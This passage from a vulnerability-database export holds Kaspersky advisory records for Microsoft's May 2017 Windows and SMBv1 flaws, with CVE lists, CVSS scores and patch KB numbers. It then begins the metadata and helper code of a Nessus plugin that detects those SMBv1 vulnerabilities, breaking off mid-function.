\n[CVE-2017-0274](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0274>)4.3Warning \n[CVE-2017-0273](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0273>)4.3Warning \n[CVE-2017-0272](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0272>)9.3Critical \n[CVE-2017-0271](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0271>)4.3Warning \n[CVE-2017-0270](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0270>)4.3Warning \n[CVE-2017-0269](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0269>)4.3Warning \n[CVE-2017-0268](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0268>)4.3Warning \n[CVE-2017-0267](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0267>)4.3Warning \n[CVE-2017-0263](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0263>)7.2High \n[CVE-2017-0259](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0259>)1.9Warning \n[CVE-2017-0258](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0258>)1.9Warning \n[CVE-2017-0246](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0246>)6.9High \n[CVE-2017-0245](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0245>)1.9Warning \n[CVE-2017-0220](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0220>)1.9Warning \n[CVE-2017-0214](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0214>)4.4Warning \n[CVE-2017-0213](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0213>)1.9Warning \n[CVE-2017-0212](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0212>)5.4High \n[CVE-2017-0190](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0190>)2.1Warning \n[CVE-2017-0171](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0171>)4.3Warning \n[CVE-2017-0077](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0077>)7.2High\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4038788](<http://support.microsoft.com/kb/4038788>) \n[4016871](<http://support.microsoft.com/kb/4016871>) \n[4019474](<http://support.microsoft.com/kb/4019474>) \n[4019215](<http://support.microsoft.com/kb/4019215>) \n[4019216](<http://support.microsoft.com/kb/4019216>) \n[4019473](<http://support.microsoft.com/kb/4019473>) \n[4019472](<http://support.microsoft.com/kb/4019472>) \n[4019213](<http://support.microsoft.com/kb/4019213>) \n[4019214](<http://support.microsoft.com/kb/4019214>)\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-09T00:00:00", "type": "kaspersky", "title": "KLA11009 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0077", "CVE-2017-0171", "CVE-2017-0190", "CVE-2017-0212", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0220", "CVE-2017-0245", "CVE-2017-0246", "CVE-2017-0258", "CVE-2017-0259", "CVE-2017-0263", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2020-09-29T00:00:00", "id": "KLA11009", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11009/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-19T15:06:09", "description": "### *Detect date*:\n05/09/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Support Update). Malicious users can exploit these vulnerabilities to obtain sensitive information, execute arbitrary code, cause denial of service, bypass security restrictions, gain privileges.\n\n### *Affected products*:\nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 for 32-bit Systems \nInternet Explorer 9 \nWindows 10 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2012 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 8.1 for 32-bit systems \nWindows 8.1 for x64-based systems \nInternet Explorer 11 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2016 \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows RT 8.1 \nWindows 10 Version 1703 for x64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows 10 Version 1511 for 32-bit Systems \nMicrosoft Edge (EdgeHTML-based) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1511 for x64-based Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nInternet Explorer 10 \nWindows 10 Version 1703 for 32-bit Systems \nWindows Server 2012 R2\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-0220](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0220>) \n[CVE-2017-0222](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0222>) \n[CVE-2017-0280](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0280>) \n[CVE-2017-0064](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0064>) \n[CVE-2017-0272](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0272>) \n[CVE-2017-0246](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0246>) \n[CVE-2017-0278](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0278>) \n[CVE-2017-0279](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0279>) \n[CVE-2017-0190](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0190>) \n[CVE-2017-0214](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0214>) \n[CVE-2017-0273](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0273>) \n[CVE-2017-0270](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0270>) \n[CVE-2017-0271](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0271>) \n[CVE-2017-0276](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0276>) \n[CVE-2017-0277](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0277>) \n[CVE-2017-0274](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0274>) \n[CVE-2017-0213](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0213>) \n[CVE-2017-0238](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0238>) \n[CVE-2017-0258](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0258>) \n[CVE-2017-0077](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0077>) \n[CVE-2017-0175](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0175>) \n[CVE-2017-0171](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0171>) \n[CVE-2017-0269](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0269>) \n[CVE-2017-0268](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0268>) \n[CVE-2017-0245](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0245>) \n[CVE-2017-0244](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0244>) \n[CVE-2017-0242](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0242>) \n[CVE-2017-0263](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0263>) \n[CVE-2017-0275](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0275>) \n[CVE-2017-0267](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0267>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2017-0238](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0238>)7.6Critical \n[CVE-2017-0222](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0222>)7.6Critical \n[CVE-2017-0064](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0064>)4.3Warning \n[CVE-2017-0280](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0280>)7.1High \n[CVE-2017-0279](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0279>)6.8High \n[CVE-2017-0278](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0278>)6.8High \n[CVE-2017-0277](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0277>)6.8High \n[CVE-2017-0276](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0276>)4.3Warning \n[CVE-2017-0275](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0275>)4.3Warning \n[CVE-2017-0274](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0274>)4.3Warning \n[CVE-2017-0273](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0273>)4.3Warning \n[CVE-2017-0272](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0272>)9.3Critical \n[CVE-2017-0271](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0271>)4.3Warning \n[CVE-2017-0270](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0270>)4.3Warning \n[CVE-2017-0269](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0269>)4.3Warning \n[CVE-2017-0268](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0268>)4.3Warning \n[CVE-2017-0267](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0267>)4.3Warning \n[CVE-2017-0263](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0263>)7.2High \n[CVE-2017-0258](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0258>)1.9Warning \n[CVE-2017-0246](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0246>)6.9High \n[CVE-2017-0245](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0245>)1.9Warning \n[CVE-2017-0244](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0244>)6.9High \n[CVE-2017-0242](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0242>)4.3Warning \n[CVE-2017-0220](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0220>)1.9Warning \n[CVE-2017-0214](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0214>)4.4Warning \n[CVE-2017-0213](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0213>)1.9Warning \n[CVE-2017-0190](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0190>)2.1Warning \n[CVE-2017-0175](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0175>)2.1Warning \n[CVE-2017-0171](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0171>)4.3Warning \n[CVE-2017-0077](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0077>)7.2High\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4018271](<http://support.microsoft.com/kb/4018271>) \n[4019264](<http://support.microsoft.com/kb/4019264>) \n[4019263](<http://support.microsoft.com/kb/4019263>) \n[4019149](<http://support.microsoft.com/kb/4019149>) \n[4018885](<http://support.microsoft.com/kb/4018885>) \n[4019206](<http://support.microsoft.com/kb/4019206>) \n[4018821](<http://support.microsoft.com/kb/4018821>) \n[4018927](<http://support.microsoft.com/kb/4018927>) \n[4018556](<http://support.microsoft.com/kb/4018556>) \n[4019204](<http://support.microsoft.com/kb/4019204>) \n[4018466](<http://support.microsoft.com/kb/4018466>) \n[4018196](<http://support.microsoft.com/kb/4018196>)", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-09T00:00:00", "type": "kaspersky", "title": "KLA11077 Multiple vulnerabilities in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0064", "CVE-2017-0077", "CVE-2017-0171", "CVE-2017-0175", "CVE-2017-0190", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0220", "CVE-2017-0222", "CVE-2017-0238", "CVE-2017-0242", "CVE-2017-0244", "CVE-2017-0245", "CVE-2017-0246", "CVE-2017-0258", "CVE-2017-0263", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2022-01-18T00:00:00", "id": "KLA11077", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11077/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-18T11:17:32", "description": "### *Detect date*:\n06/05/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nAn improper handling of objects in memory in Windows kernel-mode driver was found in Microsoft Windows. By exploiting this vulnerability malicious users can gain privileges. This vulnerability can be exploited remotely via a specially designed application by a malicious user who has logged on to the system.\n\n### *Affected products*:\nWindows 7 Service Pack 1 \nWindows Server 2008 Service Pack 2 \nWindows Server 2008 R2 Service Pack 1 \n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-8552](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8552>) \n[CVE-2017-8552](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8552>) \n\n\n### *Impacts*:\nPE \n\n### *Related products*:\n[Microsoft Windows 7](<https://threats.kaspersky.com/en/product/Microsoft-Windows-7/>)\n\n### *CVE-IDS*:\n[CVE-2017-8552](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8552>)7.2High\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4019264](<http://support.microsoft.com/kb/4019264>) \n[4019263](<http://support.microsoft.com/kb/4019263>) \n[4019204](<http://support.microsoft.com/kb/4019204>)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-06-05T00:00:00", "type": "kaspersky", "title": "KLA11040 Elevation of privilege vulnerability in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8552"], "modified": "2020-06-03T00:00:00", "id": "KLA11040", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11040/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-08-19T12:36:35", "description": "The remote Windows host has Microsoft Server Message Block 1.0 (SMBv1) enabled. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple information disclosure vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of SMBv1 packets. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted SMBv1 packet, to disclose sensitive information. (CVE-2017-0267, CVE-2017-0268, CVE-2017-0270, CVE-2017-0271, CVE-2017-0274, CVE-2017-0275, CVE-2017-0276)\n\n - Multiple denial of service vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted SMB request, to cause the system to stop responding. (CVE-2017-0269, CVE-2017-0273, CVE-2017-0280)\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of SMBv1 packets. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted SMBv1 packet, to execute arbitrary code. (CVE-2017-0272, CVE-2017-0277, CVE-2017-0278, CVE-2017-0279)\n\nDepending on the host's security policy configuration, this plugin cannot always correctly determine if the Windows host is vulnerable if the host is running a later Windows version (i.e., Windows 8.1, 10, 2012, 2012 R2, and 2016) specifically that named pipes and shares are allowed to be accessed remotely and anonymously. Tenable does not recommend this configuration, and the hosts should be checked locally for patches with one of the following plugins, depending on the Windows version : 100054, 100055, 100057, 100059, 100060, or 100061.", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-26T00:00:00", "type": "nessus", "title": "Microsoft Windows SMBv1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2019-11-13T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "MS17_MAY_SMBV1.NASL", "href": "https://www.tenable.com/plugins/nessus/100464", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100464);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\"\n );\n script_bugtraq_id(\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274\n );\n script_xref(name:\"MSKB\", value:\"4016871\");\n script_xref(name:\"MSKB\", value:\"4018466\");\n script_xref(name:\"MSKB\", value:\"4019213\");\n script_xref(name:\"MSKB\", value:\"4019214\");\n script_xref(name:\"MSKB\", value:\"4019215\");\n script_xref(name:\"MSKB\", value:\"4019216\");\n script_xref(name:\"MSKB\", value:\"4019263\");\n script_xref(name:\"MSKB\", value:\"4019264\");\n script_xref(name:\"MSKB\", value:\"4019472\");\n script_xref(name:\"MSKB\", value:\"4019473\");\n script_xref(name:\"MSKB\", value:\"4019474\");\n\n script_name(english:\"Microsoft Windows SMBv1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the response from the SMBv1 server.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host has Microsoft Server Message Block 1.0 (SMBv1)\nenabled. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple information disclosure vulnerabilities exist\n in Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of SMBv1 packets. An unauthenticated,\n remote attacker can exploit these vulnerabilities, via a\n specially crafted SMBv1 packet, to disclose sensitive\n information. (CVE-2017-0267, CVE-2017-0268,\n CVE-2017-0270, CVE-2017-0271, CVE-2017-0274,\n CVE-2017-0275, CVE-2017-0276)\n\n - Multiple denial of service vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of requests. An unauthenticated,\n remote attacker can exploit these vulnerabilities, via a\n specially crafted SMB request, to cause the system to\n stop responding. (CVE-2017-0269, CVE-2017-0273,\n CVE-2017-0280)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of SMBv1 packets. An unauthenticated,\n remote attacker can exploit these vulnerabilities, via a\n specially crafted SMBv1 packet, to execute arbitrary\n code. (CVE-2017-0272, CVE-2017-0277, CVE-2017-0278,\n CVE-2017-0279)\n\nDepending on the host's security policy configuration, this plugin\ncannot always correctly determine if the Windows host is vulnerable if\nthe host is running a later Windows version (i.e., Windows 8.1, 10,\n2012, 2012 R2, and 2016) specifically that named pipes and shares are\nallowed to be accessed remotely and anonymously. Tenable does not\nrecommend this configuration, and the hosts should be checked locally\nfor patches with one of the following plugins, depending on the\nWindows version : 100054, 100055, 100057, 100059, 100060, or 100061.\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0267\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c21268d4\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0268\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b9253982\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0269\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?23802c83\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0270\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8313bb60\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0271\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7677c678\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0272\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?36da236c\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0273\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0981b934\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0274\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c88efefa\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0275\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?695bf5cc\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0276\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?459a1e8c\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0277\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ea45bbc5\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0278\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4195776a\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0279\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fbf092cf\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0280\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8c0cc566\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the applicable security update for your Windows version :\n\n - Windows Server 2008 : KB4018466\n - Windows 7 : KB4019264\n - Windows Server 2008 R2 : KB4019264\n - Windows Server 2012 : KB4019216\n - Windows 8.1 / RT 8.1. : KB4019215\n - Windows Server 2012 R2 : KB4019215\n - Windows 10 : KB4019474\n - Windows 10 Version 1511 : KB4019473\n - Windows 10 Version 1607 : KB4019472\n - Windows 10 Version 1703 : KB4016871\n - Windows Server 2016 : KB4019472\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"smb_v1_enabled_remote.nasl\");\n script_require_keys(\"Host/OS\", \"SMB/SMBv1_is_supported\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\n\nfunction smb_get_error_code (data)\n{\n local_var header, flags2, code;\n\n # Some checks in the header first\n header = get_smb_header (smbblob:data);\n if (!header)\n return NULL;\n\n flags2 = get_header_flags2 (header:header);\n if (flags2 & SMB_FLAGS2_32BIT_STATUS)\n {\n code = get_header_nt_error_code (header:header);\n }\n else\n {\n code = get_header_dos_error_code (header:header);\n }\n\n return code;\n}\n\nfunction my_smb_trans2(setup, param, plen, data, max_pcount, max_dcount, max_scount)\n{\n local_var header, parameters, dat, packet, ret, pad1, p_offset, d_offset, 